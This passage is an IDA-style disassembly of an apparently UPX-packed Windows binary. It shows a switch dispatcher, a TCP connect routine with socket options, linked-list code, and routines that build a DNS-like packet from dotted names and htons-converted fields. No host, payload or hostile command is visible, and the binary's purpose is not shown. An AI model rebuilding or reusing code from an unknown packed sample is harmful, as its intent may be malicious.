cmp eax, 0Eh ; switch 15 cases
ja short loc_410520 ; default
; jumptable 004104A9 cases 2,3,5-13
movzx eax, byte_41056C[eax]
jmp off_410558[eax*4] ; switch jump
loc_4104B0: ; DATA XREF: UPX0:off_410558�o
push 210h ; jumptable 004104A9 case 0
call sub_4191C1
add esp, 4
test eax, eax
jz short loc_4104CB
push edi
mov ecx, eax
call sub_40FDC0
pop edi
retn
; ---------------------------------------------------------------------------
loc_4104CB: ; CODE XREF: sub_410490+2F�j
; sub_410490+4E�j ...
xor eax, eax
pop edi
retn
; ---------------------------------------------------------------------------
loc_4104CF: ; CODE XREF: sub_410490+19�j
; DATA XREF: UPX0:off_410558�o
push 210h ; jumptable 004104A9 case 1
call sub_4191C1
add esp, 4
test eax, eax
jz short loc_4104CB
push edi
mov ecx, eax
call sub_40FF10
pop edi
retn
; ---------------------------------------------------------------------------
loc_4104EA: ; CODE XREF: sub_410490+19�j
; DATA XREF: UPX0:off_410558�o
push 210h ; jumptable 004104A9 case 4
call sub_4191C1
add esp, 4
test eax, eax
jz short loc_4104CB
push edi
mov ecx, eax
call sub_40FC50
pop edi
retn
; ---------------------------------------------------------------------------
loc_410505: ; CODE XREF: sub_410490+19�j
; DATA XREF: UPX0:off_410558�o
push 214h ; jumptable 004104A9 case 14
call sub_4191C1
add esp, 4
test eax, eax
jz short loc_4104CB
push edi
mov ecx, eax
call sub_40FA30
pop edi
retn
; ---------------------------------------------------------------------------
loc_410520: ; CODE XREF: sub_410490+10�j
; sub_410490+19�j
; DATA XREF: ...
push esi ; default
; jumptable 004104A9 cases 2,3,5-13
push 114h
call sub_4191C1
mov esi, eax
add esp, 4
test esi, esi
jz short loc_410551
push edi
mov ecx, esi
call sub_40F6D0
mov dword ptr [esi], offset off_424548
mov dword ptr [esi+110h], 0
mov eax, esi
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_410551: ; CODE XREF: sub_410490+A2�j
pop esi
xor eax, eax
pop edi
retn
sub_410490 endp
; ---------------------------------------------------------------------------
align 4
off_410558 dd offset loc_4104B0 ; DATA XREF: sub_410490+19�r
dd offset loc_4104CF ; jump table for switch statement
dd offset loc_4104EA
dd offset loc_410505
dd offset loc_410520
byte_41056C db 0, 1, 4, 4 ; DATA XREF: sub_410490+12�r
db 2, 4, 4, 4 ; indirect table for switch statement
db 4, 4, 4, 4
db 4, 4, 3
align 10h
; =============== S U B R O U T I N E =======================================
sub_410580 proc near ; CODE XREF: sub_411CF0+16�p
arg_0 = dword ptr 4
push esi
mov esi, [ecx+28C8h]
push edi
xor edi, edi
test esi, esi
mov [ecx+28D4h], esi
jz short loc_4105CC
push ebx
mov ebx, [esp+0Ch+arg_0]
lea esp, [esp+0]
loc_4105A0: ; CODE XREF: sub_410580+35�j
mov eax, [esi]
push ebx
push eax
call sub_419312
add esp, 8
test eax, eax
jz short loc_4105BF
mov esi, [esi+4]
test esi, esi
jnz short loc_4105A0
pop ebx
mov eax, edi
pop edi
pop esi
retn 4
; ---------------------------------------------------------------------------
loc_4105BF: ; CODE XREF: sub_410580+2E�j
mov eax, [esi]
pop ebx
pop edi
add eax, 100h
pop esi
retn 4
; ---------------------------------------------------------------------------
loc_4105CC: ; CODE XREF: sub_410580+12�j
mov eax, edi
pop edi
pop esi
retn 4
sub_410580 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4105E0 proc near ; CODE XREF: sub_4106A0+21�p
var_14 = byte ptr -14h
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
sub esp, 14h
mov eax, dword_42A290
mov edx, [esp+14h+arg_0]
push esi
mov [esp+18h+var_4], eax
mov esi, ecx
mov ecx, [esp+18h+arg_4]
lea eax, [esp+18h+var_14]
push eax
push ecx
push edx
mov ecx, esi
call sub_40F1E0
test eax, eax
jz short loc_410627
mov edx, [esi+4]
push 10h
lea ecx, [esp+1Ch+var_14]
push ecx
push edx
call dword_424268 ; connect
test eax, eax
jz short loc_41064A
call dword_424240 ; WSAGetLastError
mov [esi+8], eax
loc_410627: ; CODE XREF: sub_4105E0+27�j
mov eax, [esi+4]
push eax
call dword_42426C ; closesocket
mov dword ptr [esi+4], 0FFFFFFFFh
xor eax, eax
pop esi
mov ecx, [esp+14h+var_4]
call sub_4192B6
add esp, 14h
retn 8
; ---------------------------------------------------------------------------
loc_41064A: ; CODE XREF: sub_4105E0+3C�j
mov edx, [esi+4]
push edi
mov edi, dword_424254
push 4
lea ecx, [esp+20h+arg_4]
push ecx
push 1006h
push 6
push edx
mov [esp+30h+arg_4], 3E8h
call edi ; setsockopt
mov ecx, [esi+4]
push 4
lea eax, [esp+20h+arg_4]
push eax
push 1005h
push 6
push ecx
call edi ; setsockopt
mov ecx, [esp+1Ch+var_4]
pop edi
mov eax, 1
pop esi
call sub_4192B6
add esp, 14h
retn 8
sub_4105E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4106A0 proc near ; CODE XREF: sub_4110E0+E4�p
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, large fs:0
push 0FFFFFFFFh
push offset SEH_4106A0
push eax
mov eax, [esp+0Ch+arg_4]
mov large fs:0, esp
push esi
push edi
mov edi, [esp+14h+arg_0]
push eax
push edi
call sub_4105E0
test eax, eax
jnz short loc_410725
push 30Ch
call sub_4191C1
mov esi, eax
add esp, 4
mov [esp+14h+arg_0], esi
xor eax, eax
cmp esi, eax
mov [esp+14h+var_4], eax
jz short loc_41070A
call dword_42412C ; RtlGetLastWin32Error
push eax
push edi
push 23h
push offset dword_4292B0
mov ecx, offset off_42AE60
call sub_406AE0
push eax
push esi
call sub_407090
add esp, 10h
loc_41070A: ; CODE XREF: sub_4106A0+45�j
push offset dword_4264B4
lea ecx, [esp+18h+arg_4]
push ecx
mov [esp+1Ch+var_4], 0FFFFFFFFh
mov [esp+1Ch+arg_4], eax
call sub_41A2B3
loc_410725: ; CODE XREF: sub_4106A0+28�j
mov ecx, [esp+14h+var_C]
pop edi
mov large fs:0, ecx
pop esi
add esp, 0Ch
retn 8
sub_4106A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_410740 proc near ; CODE XREF: sub_404800+EC�p
; sub_406AE0+71�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push ebp
push 0Ch
mov ebx, ecx
call sub_4191C1
xor ecx, ecx
add esp, 4
cmp eax, ecx
jz short loc_41075C
mov [eax+4], ecx
mov [eax+8], ecx
jmp short loc_41075E
; ---------------------------------------------------------------------------
loc_41075C: ; CODE XREF: sub_410740+12�j
xor eax, eax
loc_41075E: ; CODE XREF: sub_410740+1A�j
mov edx, [esp+8+arg_0]
mov [eax], edx
mov ebp, [ebx+0Ch]
cmp ebp, ecx
jnz short loc_410779
pop ebp
mov [ebx+0Ch], eax
mov [ebx+10h], eax
mov [ebx+18h], eax
pop ebx
retn 8
; ---------------------------------------------------------------------------
loc_410779: ; CODE XREF: sub_410740+29�j
mov ecx, [ebx+10h]
push esi
mov esi, [esp+0Ch+arg_4]
push edi
mov edi, 1
cmp esi, edi
mov edx, ecx
jl short loc_41079C
lea ecx, [ecx+0]
loc_410790: ; CODE XREF: sub_410740+5A�j
cmp edx, ebp
jz short loc_41079C
mov edx, [edx+8]
inc edi
cmp edi, esi
jle short loc_410790
loc_41079C: ; CODE XREF: sub_410740+4B�j
; sub_410740+52�j
cmp edi, esi
jz short loc_4107E6
test esi, esi
jz short loc_4107E6
mov edx, 1
cmp esi, edx
jl short loc_4107BC
lea ecx, [ecx+0]
loc_4107B0: ; CODE XREF: sub_410740+7A�j
cmp ecx, ebp
jz short loc_4107BC
mov ecx, [ecx+8]
inc edx
cmp edx, esi
jle short loc_4107B0
loc_4107BC: ; CODE XREF: sub_410740+6B�j
; sub_410740+72�j
mov edx, [ecx+8]
test edx, edx
mov [ecx+8], eax
mov [eax+8], edx
mov [eax+4], ecx
jz short loc_4107D9
pop edi
pop esi
mov [edx+4], eax
pop ebp
mov [ebx+18h], eax
pop ebx
retn 8
; ---------------------------------------------------------------------------
loc_4107D9: ; CODE XREF: sub_410740+8A�j
pop edi
pop esi
pop ebp
mov [ebx+0Ch], eax
mov [ebx+18h], eax
pop ebx
retn 8
; ---------------------------------------------------------------------------
loc_4107E6: ; CODE XREF: sub_410740+5E�j
; sub_410740+62�j
mov ecx, [edx+4]
test ecx, ecx
mov [edx+4], eax
mov [eax+8], edx
mov [eax+4], ecx
jz short loc_410803
pop edi
pop esi
mov [ecx+8], eax
pop ebp
mov [ebx+18h], eax
pop ebx
retn 8
; ---------------------------------------------------------------------------
loc_410803: ; CODE XREF: sub_410740+B4�j
pop edi
pop esi
pop ebp
mov [ebx+10h], eax
mov [ebx+18h], eax
pop ebx
retn 8
sub_410740 endp
; =============== S U B R O U T I N E =======================================
sub_410810 proc near ; CODE XREF: sub_4110E0+67�p
var_4 = dword ptr -4
push ecx
push ebx
push esi
push edi
push 18h
mov edi, ecx
call sub_4191C1
xor esi, esi
add esp, 4
cmp eax, esi
jz short loc_410841
mov [eax+4], esi
mov [eax+8], esi
mov [eax+0Ch], esi
mov [eax+14h], esi
mov dword ptr [eax+10h], 40h
mov dword ptr [eax], offset off_424484
mov esi, eax
loc_410841: ; CODE XREF: sub_410810+14�j
mov ebx, dword_424264
xor eax, eax
mov ax, [edi]
push eax
call ebx ; htons
push 2
mov ecx, esi
mov [esp+14h+var_4], eax
lea eax, [esp+14h+var_4]
push eax
call sub_40F670
xor eax, eax
mov ax, [edi+4]
push eax
call ebx ; htons
push 2
lea ecx, [esp+14h+var_4]
push ecx
mov ecx, esi
mov [esp+18h+var_4], eax
call sub_40F670
xor eax, eax
mov ax, [edi+8]
push eax
call ebx ; htons
push 2
lea edx, [esp+14h+var_4]
push edx
mov ecx, esi
mov [esp+18h+var_4], eax
call sub_40F670
xor eax, eax
mov ax, [edi+0Ah]
push eax
call ebx ; htons
push 2
mov ecx, esi
mov [esp+14h+var_4], eax
lea eax, [esp+14h+var_4]
push eax
call sub_40F670
xor eax, eax
mov ax, [edi+0Ch]
push eax
call ebx ; htons
push 2
lea ecx, [esp+14h+var_4]
push ecx
mov ecx, esi
mov [esp+18h+var_4], eax
call sub_40F670
movzx edi, word ptr [edi+0Eh]
push edi
call ebx ; htons
push 2
lea edx, [esp+14h+var_4]
push edx
mov ecx, esi
mov [esp+18h+var_4], eax
call sub_40F670
pop edi
mov eax, esi
pop esi
pop ebx
pop ecx
retn
sub_410810 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4108F0 proc near ; CODE XREF: sub_4110E0+175�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, [esp+10h+arg_0]
mov esi, ecx
push 2
push esi
mov ecx, edi
call sub_4085A0
mov ebx, dword_424234
xor eax, eax
mov ax, [esi]
push eax
call ebx ; htons
push 2
lea ebp, [esi+4]
push ebp
mov ecx, edi
mov [esi], ax
call sub_4085A0
xor ecx, ecx
mov cx, [ebp+0]
push ecx
call ebx ; htons
mov [ebp+0], ax
push 2
lea ebp, [esi+8]
push ebp
mov ecx, edi
call sub_4085A0
xor edx, edx
mov dx, [ebp+0]
push edx
call ebx ; htons
mov [ebp+0], ax
push 2
lea ebp, [esi+0Ah]
push ebp
mov ecx, edi
call sub_4085A0
xor eax, eax
mov ax, [ebp+0]
push eax
call ebx ; htons
mov [ebp+0], ax
push 2
lea ebp, [esi+0Ch]
push ebp
mov ecx, edi
call sub_4085A0
xor ecx, ecx
mov cx, [ebp+0]
push ecx
call ebx ; htons
push 2
add esi, 0Eh
push esi
mov ecx, edi
mov [ebp+0], ax
call sub_4085A0
xor edx, edx
mov dx, [esi]
push edx
call ebx ; htons
pop edi
mov [esi], ax
pop esi
pop ebp
pop ebx
retn 4
sub_4108F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4109A0 proc near ; CODE XREF: sub_410DB0+64�p
; DATA XREF: UPX0:00424538�o
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, [esp+10h+arg_0]
mov eax, [edi]
mov esi, ecx
push 0
mov ecx, edi
call dword ptr [eax+4]
lea ebx, [esi+4]
mov ecx, eax
sub ebx, eax
lea ebx, [ebx+0]
loc_4109C0: ; CODE XREF: sub_4109A0+28�j
mov dl, [ecx]
mov [ebx+ecx], dl
inc ecx
test dl, dl
jnz short loc_4109C0
push eax
call sub_4198AE
add esp, 4
push 2
lea ebx, [esi+104h]
push ebx
mov ecx, edi
call sub_4085A0
mov ebp, dword_424234
xor ecx, ecx
mov cx, [ebx]
push ecx
call ebp ; htons
mov [ebx], ax
push 2
lea ebx, [esi+106h]
push ebx
mov ecx, edi
call sub_4085A0
xor edx, edx
mov dx, [ebx]
push edx
call ebp ; htons
mov [ebx], ax
push 4
lea ebx, [esi+108h]
push ebx
mov ecx, edi
call sub_4085A0
mov eax, [ebx]
push eax
call dword_424230 ; htonl
push 2
add esi, 10Ch
push esi
mov ecx, edi
mov [ebx], eax
call sub_4085A0
xor ecx, ecx
mov cx, [esi]
push ecx
call ebp ; htons
pop edi
mov [esi], ax
pop esi
pop ebp
pop ebx
retn 4
sub_4109A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_410A50 proc near ; DATA XREF: UPX0:0042455C�o
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
mov ebp, [esi+14h]
push edi
mov ebx, ecx
push 2
lea edi, [ebx+110h]
push edi
mov ecx, esi
call sub_4085A0
xor eax, eax
mov ax, [edi]
push eax
call dword_424234 ; htons
mov [edi], ax
mov edx, [esi]
push 0
mov ecx, esi
call dword ptr [edx+4]
lea edi, [ebx+112h]
mov ecx, eax
sub edi, eax
nop
loc_410A90: ; CODE XREF: sub_410A50+48�j
mov dl, [ecx]
mov [edi+ecx], dl
inc ecx
test dl, dl
jnz short loc_410A90
push eax
call sub_4198AE
movzx eax, word ptr [ebx+10Ch]
add esp, 4
add eax, ebp
pop edi
mov [esi+14h], eax
pop esi
pop ebp
pop ebx
retn 4
sub_410A50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_410AC0 proc near ; DATA XREF: UPX0:0042457C�o
var_47 = byte ptr -47h
var_46 = byte ptr -46h
var_45 = byte ptr -45h
var_44 = byte ptr -44h
var_4 = dword ptr -4
arg_0 = dword ptr 4
sub esp, 48h
mov eax, dword_42A290
push esi
mov esi, [esp+4Ch+arg_0]
push edi
mov [esp+50h+var_4], eax
push 1
lea eax, [esp+54h+var_46]
mov edi, ecx
push eax
mov ecx, esi
call sub_4085A0
push 1
lea ecx, [esp+54h+var_47]
push ecx
mov ecx, esi
call sub_4085A0
push 1
lea edx, [esp+54h+var_45]
push edx
mov ecx, esi
call sub_4085A0
push 1
lea eax, [esp+54h+arg_0]
push eax
mov ecx, esi
call sub_4085A0
movzx ecx, byte ptr [esp+50h+arg_0]
movzx edx, [esp+50h+var_45]
movzx eax, [esp+50h+var_47]
push ecx
movzx ecx, [esp+54h+var_46]
push edx
push eax
push ecx
push 0Ch
push offset dword_428918
mov ecx, offset off_42AE60
call sub_406AE0
push eax
lea edx, [esp+64h+var_44]
push edx
call sub_419B8A
add esp, 18h
lea eax, [esp+50h+var_44]
lea edx, [edi+110h]
mov ecx, eax
pop edi
sub edx, ecx
pop esi
loc_410B53: ; CODE XREF: sub_410AC0+9B�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_410B53
mov ecx, [esp+48h+var_4]
call sub_4192B6
add esp, 48h
retn 4
sub_410AC0 endp
; ---------------------------------------------------------------------------
align 10h
loc_410B70: ; DATA XREF: UPX0:off_424558�o
; UPX0:off_424568�o ...
push esi
mov esi, ecx
call sub_410B90
test byte ptr [esp+8], 1
jz short loc_410B88
push esi
call sub_41930D
add esp, 4
loc_410B88: ; CODE XREF: UPX0:00410B7D�j
mov eax, esi
pop esi
retn 4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_410B90 proc near ; CODE XREF: UPX0:00410B73�p
; UPX0:004232B6�j
mov dword ptr [ecx], offset off_424534
retn
sub_410B90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_410BA0 proc near ; CODE XREF: sub_4110E0+A3�p
var_8 = dword ptr -8
var_4 = dword ptr -4
sub esp, 8
push ebx
push ebp
push edi
mov edi, ecx
push 18h
mov [esp+18h+var_4], edi
call sub_4191C1
xor ebx, ebx
add esp, 4
cmp eax, ebx
jz short loc_410BD9
mov [eax+4], ebx
mov [eax+8], ebx
mov [eax+0Ch], ebx
mov dword ptr [eax+10h], 40h
mov [eax+14h], ebx
mov dword ptr [eax], offset off_424484
mov ebp, eax
jmp short loc_410BDB
; ---------------------------------------------------------------------------
loc_410BD9: ; CODE XREF: sub_410BA0+1A�j
xor ebp, ebp
loc_410BDB: ; CODE XREF: sub_410BA0+37�j
push esi
xor esi, esi
mov [esp+18h+var_8], esi
loc_410BE2: ; CODE XREF: sub_410BA0+FC�j
mov eax, [edi+0Ch]
cmp eax, ebx
jz loc_410CA1
mov ecx, 1
cmp esi, ecx
jl short loc_410C10
mov edx, [edi+10h]
lea esp, [esp+0]
loc_410C00: ; CODE XREF: sub_410BA0+6E�j
cmp eax, edx
jz loc_410CA1
mov eax, [eax+4]
inc ecx
cmp ecx, esi
jle short loc_410C00
loc_410C10: ; CODE XREF: sub_410BA0+54�j
mov [edi+18h], eax
mov esi, [eax]
cmp esi, ebx
jz loc_410CA1
mov eax, esi
lea edx, [eax+1]
loc_410C22: ; CODE XREF: sub_410BA0+87�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_410C22
mov ecx, [ebp+8]
sub eax, edx
mov ebx, eax
mov eax, [ebp+0Ch]
inc eax
cmp eax, ecx
jle short loc_410C44
push eax
mov ecx, ebp
call sub_40F600
test eax, eax
jz short loc_410C51
loc_410C44: ; CODE XREF: sub_410BA0+96�j
mov ecx, [ebp+0Ch]
mov eax, [ebp+4]
add eax, ecx
mov [eax], bl
inc dword ptr [ebp+0Ch]
loc_410C51: ; CODE XREF: sub_410BA0+A2�j
mov ecx, [ebp+0Ch]
movzx ebx, bl
lea eax, [ecx+ebx]
cmp eax, [ebp+8]
jle short loc_410C6B
push eax
mov ecx, ebp
call sub_40F600
test eax, eax
jz short loc_410C8F
loc_410C6B: ; CODE XREF: sub_410BA0+BD�j
mov edx, [ebp+0Ch]
mov edi, [ebp+4]
add edi, edx
mov ecx, ebx
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov eax, [ebp+0Ch]
mov edi, [esp+18h+var_4]
add eax, ebx
mov [ebp+0Ch], eax
loc_410C8F: ; CODE XREF: sub_410BA0+C9�j
mov eax, [esp+18h+var_8]
inc eax
mov [esp+18h+var_8], eax
mov esi, eax
xor ebx, ebx
jmp loc_410BE2
; ---------------------------------------------------------------------------
loc_410CA1: ; CODE XREF: sub_410BA0+47�j
; sub_410BA0+62�j ...
mov eax, [ebp+0Ch]
mov ecx, [ebp+8]
xor bl, bl
inc eax
cmp eax, ecx
jle short loc_410CBA
push eax
mov ecx, ebp
call sub_40F600
test eax, eax
jz short loc_410CC7
loc_410CBA: ; CODE XREF: sub_410BA0+10C�j
mov ecx, [ebp+0Ch]
mov eax, [ebp+4]
add eax, ecx
mov [eax], bl
inc dword ptr [ebp+0Ch]
loc_410CC7: ; CODE XREF: sub_410BA0+118�j
mov esi, dword_424264
xor eax, eax
mov ax, [edi+1Ch]
push eax
call esi ; htons
mov ecx, [ebp+8]
mov ebx, 2
mov [esp+14h], eax
mov eax, [ebp+0Ch]
add eax, 2
cmp eax, ecx
jle short loc_410CF8
push eax
mov ecx, ebp
call sub_40F600
test eax, eax
jz short loc_410D0B
loc_410CF8: ; CODE XREF: sub_410BA0+14A�j
mov edx, [ebp+0Ch]
mov ecx, [ebp+4]
add ecx, edx
mov dx, [esp+14h]
mov [ecx], dx
add [ebp+0Ch], ebx
loc_410D0B: ; CODE XREF: sub_410BA0+156�j
xor eax, eax
mov ax, [edi+1Eh]
push eax
call esi ; htons
mov ecx, [ebp+8]
pop esi
mov [esp+14h+var_4], eax
mov eax, [ebp+0Ch]
add eax, 2
cmp eax, ecx
jle short loc_410D32
push eax
mov ecx, ebp
call sub_40F600
test eax, eax
jz short loc_410D45
loc_410D32: ; CODE XREF: sub_410BA0+184�j
mov ecx, [ebp+0Ch]
mov eax, [ebp+4]
add eax, ecx
mov cx, word ptr [esp+14h+var_4]
mov [eax], cx
add [ebp+0Ch], ebx
loc_410D45: ; CODE XREF: sub_410BA0+190�j
pop edi
mov eax, ebp
pop ebp
pop ebx
add esp, 8
retn
sub_410BA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_410D50 proc near ; CODE XREF: sub_4110E0+180�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
mov eax, [esi]
push edi
mov ebx, ecx
push 0
mov ecx, esi
call dword ptr [eax+4]
push eax
call sub_4198AE
add esp, 4
push 2
lea edi, [ebx+1Ch]
push edi
mov ecx, esi
call sub_4085A0
mov ebp, dword_424234
xor ecx, ecx
mov cx, [edi]
push ecx
call ebp ; htons
mov [edi], ax
push 2
lea edi, [ebx+1Eh]
push edi
mov ecx, esi
call sub_4085A0
xor edx, edx
mov dx, [edi]
push edx
call ebp ; htons
mov [edi], ax
pop edi
pop esi
pop ebp
pop ebx
retn 4
sub_410D50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_410DB0 proc near ; CODE XREF: sub_4110E0+1A0�p
; sub_4110E0+1B6�p ...
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 0FFFFFFFFh
push offset SEH_410DB0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 118h
mov eax, dword_42A290
mov [esp+124h+var_10], eax
mov eax, [esp+124h+arg_4]
push ebp
xor ebp, ebp
cmp eax, ebp
jle loc_410E79
push ebx
push esi
push edi
mov edi, [esp+134h+arg_0]
lea ebx, [ecx+2810h]
mov [esp+134h+var_124], eax
lea ecx, [ecx+0]
loc_410E00: ; CODE XREF: sub_410DB0+C4�j
mov [esp+134h+var_120], offset off_424534
push ebx
lea ecx, [esp+138h+var_120]
mov [esp+138h+var_4], ebp
call sub_4109A0
lea eax, [esp+134h+var_120]
push eax
call sub_410490
mov esi, eax
mov edx, [esi]
add esp, 4
push ebx
mov ecx, esi
call dword ptr [edx+4]
push 0Ch
call sub_4191C1
add esp, 4
cmp eax, ebp
jz short loc_410E46
mov [eax+4], ebp
mov [eax+8], ebp
jmp short loc_410E48
; ---------------------------------------------------------------------------
loc_410E46: ; CODE XREF: sub_410DB0+8C�j
xor eax, eax
loc_410E48: ; CODE XREF: sub_410DB0+94�j
mov [eax], esi
cmp [edi+10h], ebp
jnz short loc_410E9D
mov [edi+10h], eax
loc_410E52: ; CODE XREF: sub_410DB0+FE�j
mov [edi+14h], eax
loc_410E55: ; CODE XREF: sub_410DB0+103�j
mov [edi+1Ch], eax
mov eax, [esp+134h+var_124]
dec eax
mov [esp+134h+var_4], 0FFFFFFFFh
mov [esp+134h+var_120], offset off_424534
mov [esp+134h+var_124], eax
jnz short loc_410E00
pop edi
pop esi
pop ebx
loc_410E79: ; CODE XREF: sub_410DB0+33�j
mov ecx, [esp+128h+var_C]
mov large fs:0, ecx
mov ecx, [esp+128h+var_10]
pop ebp
call sub_4192B6
add esp, 124h
retn 8
; ---------------------------------------------------------------------------
loc_410E9D: ; CODE XREF: sub_410DB0+9D�j
mov ecx, [edi+14h]
mov edx, [ecx+4]
cmp edx, ebp
mov [ecx+4], eax
mov [eax+8], ecx
mov [eax+4], edx
jz short loc_410E52
mov [edx+8], eax
jmp short loc_410E55
sub_410DB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_410EC0 proc near ; CODE XREF: sub_408C40+BF�p
; sub_411CF0+CD�p
arg_0 = dword ptr 4
push esi
mov esi, [ecx+0Ch]
test esi, esi
jnz short loc_410ECE
xor eax, eax
pop esi
retn 4
; ---------------------------------------------------------------------------
loc_410ECE: ; CODE XREF: sub_410EC0+6�j
mov edx, [esp+4+arg_0]
mov eax, 1
cmp edx, eax
push edi
jl short loc_410EEC
mov edi, [ecx+10h]
nop
loc_410EE0: ; CODE XREF: sub_410EC0+2A�j
cmp esi, edi
jz short loc_410F08
mov esi, [esi+4]
inc eax
cmp eax, edx
jle short loc_410EE0
loc_410EEC: ; CODE XREF: sub_410EC0+1A�j
mov eax, [esi+8]
test eax, eax
jz short loc_410F17
mov edx, [esi+4]
mov [eax+4], edx
mov eax, [esi+4]
test eax, eax
jz short loc_410F0F
mov edx, [esi+8]
mov [eax+8], edx
jmp short loc_410F3D
; ---------------------------------------------------------------------------
loc_410F08: ; CODE XREF: sub_410EC0+22�j
pop edi
xor eax, eax
pop esi
retn 4
; ---------------------------------------------------------------------------
loc_410F0F: ; CODE XREF: sub_410EC0+3E�j
mov eax, [esi+8]
mov [ecx+10h], eax
jmp short loc_410F3D
; ---------------------------------------------------------------------------
loc_410F17: ; CODE XREF: sub_410EC0+31�j
mov eax, [esi+4]
test eax, eax
jz short loc_410F2F
mov edx, eax
mov dword ptr [edx+8], 0
mov eax, [esi+4]
mov [ecx+0Ch], eax
jmp short loc_410F3D
; ---------------------------------------------------------------------------
loc_410F2F: ; CODE XREF: sub_410EC0+5C�j
mov dword ptr [ecx+10h], 0
mov dword ptr [ecx+0Ch], 0
loc_410F3D: ; CODE XREF: sub_410EC0+46�j
; sub_410EC0+55�j ...
mov eax, [ecx+14h]
test eax, eax
mov edx, [ecx+0Ch]
mov [ecx+18h], edx
jz short loc_410F59
mov eax, [esi]
test eax, eax
jz short loc_410F59
push eax
call sub_41930D
add esp, 4
loc_410F59: ; CODE XREF: sub_410EC0+88�j
; sub_410EC0+8E�j
push esi
call sub_41930D
add esp, 4
pop edi
mov eax, 1
pop esi
retn 4
sub_410EC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410F70 proc near ; CODE XREF: sub_4110E0+4A�p
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_118 = byte ptr -118h
var_14 = dword ptr -14h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
push 0FFFFFFFFh
push offset SEH_410F70
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 120h
mov eax, dword_42A290
push ebx
mov ebx, ecx
push esi
xor esi, esi
mov [esp+134h+var_14], eax
mov eax, 1
push edi
mov [esp+138h+var_11C], ebx
mov [ebx+4], esi
mov [ebx+8], esi
mov [ebx+0Ch], esi
mov [ebx+10h], esi
mov [ebx+18h], esi
mov [ebx+14h], eax
mov edx, [ebp+arg_0]
sub eax, edx
mov [esp+138h+var_4], esi
mov [esp+138h+var_12C], esi
mov [esp+138h+var_124], eax
loc_410FD3: ; CODE XREF: sub_410F70+10A�j
mov al, [edx]
cmp al, 2Eh
mov [esp+138h+var_128], edx
jz short loc_410FE5
test al, al
jnz loc_411075
loc_410FE5: ; CODE XREF: sub_410F70+6B�j
xor eax, eax
mov ecx, 40h
lea edi, [esp+138h+var_118]
rep stosd
mov ecx, [esp+138h+var_12C]
mov eax, [ebp+arg_0]
sub ecx, esi
add esi, eax
mov eax, ecx
shr ecx, 2
lea edi, [esp+138h+var_118]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, [esp+138h+var_124]
add ecx, edx
push 100h
mov [esp+13Ch+var_120], ecx
call sub_4191BC
mov esi, eax
lea eax, [esp+13Ch+var_118]
mov edi, esi
mov edx, eax
add esp, 4
sub edi, edx
loc_411032: ; CODE XREF: sub_410F70+CA�j
mov cl, [eax]
mov [edi+eax], cl
inc eax
test cl, cl
jnz short loc_411032
push 0Ch
call sub_4191C1
xor edi, edi
add esp, 4
cmp eax, edi
jz short loc_411054
mov [eax+4], edi
mov [eax+8], edi
jmp short loc_411056
; ---------------------------------------------------------------------------
loc_411054: ; CODE XREF: sub_410F70+DA�j
xor eax, eax
loc_411056: ; CODE XREF: sub_410F70+E2�j
mov [eax], esi
cmp [ebx+0Ch], edi
jnz short loc_41107F
mov [ebx+0Ch], eax
loc_411060: ; CODE XREF: sub_410F70+120�j
mov [ebx+10h], eax
loc_411063: ; CODE XREF: sub_410F70+125�j
mov [ebx+18h], eax
mov eax, [esp+138h+var_128]
cmp byte ptr [eax], 0
jz short loc_411097
mov esi, [esp+138h+var_120]
mov edx, eax
loc_411075: ; CODE XREF: sub_410F70+6F�j
inc [esp+138h+var_12C]
inc edx
jmp loc_410FD3
; ---------------------------------------------------------------------------
loc_41107F: ; CODE XREF: sub_410F70+EB�j
mov ecx, [ebx+10h]
mov edx, [ecx+4]
cmp edx, edi
mov [ecx+4], eax
mov [eax+8], ecx
mov [eax+4], edx
jz short loc_411060
mov [edx+8], eax
jmp short loc_411063
; ---------------------------------------------------------------------------
loc_411097: ; CODE XREF: sub_410F70+FD�j
